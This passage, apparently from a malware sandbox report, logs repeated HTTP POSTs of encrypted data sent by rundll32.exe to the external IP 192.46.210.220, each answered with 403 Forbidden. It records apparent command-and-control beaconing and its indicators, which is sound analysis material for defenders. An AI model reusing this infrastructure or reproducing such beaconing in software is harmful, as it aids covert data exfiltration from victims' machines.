2021-10-28 03:08:55 UTC | 289 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:56 UTC | 299 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:08:56 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
59 | 192.168.2.4 | 50073 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:55 UTC | 294 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:08:55 UTC | 294 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:56 UTC | 299 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:08:56 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49809 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:14 UTC | 29 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:07:14 UTC | 30 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:14 UTC | 39 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:14 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
60 | 192.168.2.4 | 50090 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:59 UTC | 299 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:08:59 UTC | 299 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:00 UTC | 309 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:09:00 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
61 | 192.168.2.4 | 50091 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:00 UTC | 304 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:09:00 UTC | 304 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:00 UTC | 309 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:09:00 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
62 | 192.168.2.4 | 50106 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:03 UTC | 309 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:09:03 UTC | 309 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:04 UTC | 319 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:09:04 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
63 | 192.168.2.4 | 50107 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:03 UTC | 314 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:09:03 UTC | 314 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:04 UTC | 319 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:09:04 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
64 | 192.168.2.4 | 50114 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:07 UTC | 319 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4853
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:09:07 UTC | 319 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:08 UTC | 329 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:09:08 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
65 | 192.168.2.4 | 50115 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:07 UTC | 324 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4865
    Connection: Close
    Cache-Control: no-cache
2021-10-28 03:09:07 UTC | 324 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:08 UTC | 329 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:09:08 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
66 | 192.168.2.4 | 50122 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:11 UTC | 329 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:09:11 UTC | 329 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:12 UTC | 339 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
67 | 192.168.2.4 | 50123 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:11 UTC | 334 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:09:11 UTC | 334 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:12 UTC | 339 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
68 | 192.168.2.4 | 50130 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:15 UTC | 339 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:09:15 UTC | 339 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:16 UTC | 349 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:16 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
69 | 192.168.2.4 | 50131 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:15 UTC | 344 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:09:15 UTC | 344 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:09:16 UTC | 349 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:09:16 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49810 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:14 UTC | 34 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:14 UTC | 34 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:15 UTC | 39 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:15 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
70 | 192.168.2.4 | 50138 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:09:19 UTC | 349 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
